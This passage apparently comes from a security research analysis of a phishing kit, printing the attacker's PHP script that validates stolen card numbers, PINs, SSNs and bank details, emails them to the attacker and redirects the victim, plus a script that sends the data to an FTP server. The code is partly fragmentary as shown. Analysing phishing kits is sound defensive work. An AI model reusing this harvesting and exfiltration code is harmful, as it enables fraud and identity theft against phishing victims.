German PHP script analysis

In this side note we analyse an example script that used to validate the information entered by users into a HTML form on a phishing web site. Initially the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file xxxxISAPI.dll (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.

$error = "None";
$badw="fuck pussy dick suck asshole";

//Checking for errors in the post:
//1 - CC nr:
    $error="Invalid credit card number, please re-submit.";
else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){
    $error="Invalid credit card number, please re-submit.";
//2 - Email syntax:
else if(strstr($email, '@') == FALSE){
    $error="Invalid email address, please re-submit.";
//3 - Routing number (if it does exist)
else if(strlen($bankr)>0 && strlen($bankr)<9){
    $error="Invalid bank routing number, please re-submit.";
//4 - CVV2 check
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){
    $error="Invalid card validation code, please re-submit.";

//4 - PIN check
else if(strlen($ccp)!=4&&strlen($ccp)!=4){
    $error="Invalid pin number, please re-submit.";
//5 fields that should exist:
else if(strlen($username)<1){
    $error="Please enter your full name and re-submit.";
else if(strlen($streetaddr)<1){
    $error="Please enter your address and re-submit.";
else if(strlen($cityaddr)<1){
    $error="Please enter your city and re-submit.";
else if(strlen($mmn)<1){
    $error="Please enter your Mother Maiden Name and re-submit.";
else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){
    $error="Please enter your Date Of Birth and re-submit.";
//6 - Bad words check
else if(stristr($badw,$username)){
    $error="ERROR - Invalid user name or password.";
else if(stristr($badw,$streetaddr)){
    $error="ERROR - Invalid user name or password.";
else if(stristr($badw,$cityaddr)){
    $error="ERROR - Invalid user name or password.";
else if(stristr($badw,$mmn)){
    $error="ERROR - Invalid user name or password.";
//More coming soon:)
//If no error:
if($errchk==0) {
    $timed = date ("l dS of F Y h:i:s A");
    $ip = $_SERVER["REMOTE_ADDR"];
    On $timed the user ($ip) wrote:
    CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year";

    $message=$message."UserId - $userid";

    $message=$message."Password - $pass";

    $message=$message."Email - $email";

    $message=$message."Email Password - $emailp";

    $message=$message."Full Name - $username";

    $message=$message."Address - $streetaddr";

    $message=$message."City - $cityaddr";

    $message=$message."State - $stateprovaddr";

    $message=$message."Zip Code - $zipcodeaddr";

    $message=$message."Phone number - $phone";

    $message=$message."Country - $countryaddr";

    $message=$message."CVV - $cvv2";

    $message=$message."Bank Name - $bank";

    $message=$message."Bank Routing # - $bankr
        Checking Account # - $bankc
        Social Security Number - $ssn
        Card PIN Number - $ccp
        Mother's Maiden Name - $mmn
        Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy
        Driver Licence Number - $dln";

    mail ("[email protected]","xxEBAYxx","$message","From:  tzonfi <[email protected]>\n");

    header ("Location:xxxxISAPI.dll");
    //$muie = fopen("/tmp/eb.txt", "a");
    //fwrite($muie, $message);
else {
    echo $error;

The script cc-ftp.php (commented out in the data processing script above) will transfer the input to an FTP server:

<em>&lt;?php include(&quot;r-config.php&quot;); </em>// the server login information<em>$fcon = ftp_connect($host); if(@ftp_login($fcon, $user, $pass)) { ftp_put($fcon, $fremote, $flocal, FTP_ASCII); } else { $msg = &quot;Unable to connect to host: $host with user: $user and pass: $pass. Please update me.&quot;; mail (&quot;[email protected]&quot;,&quot;Ftpupdate&quot;,&quot;$msg&quot;,&quot;From:jmekeru &lt;[email protected]&gt;\n&quot;); } ftp_close($fcon); ?&gt;</em>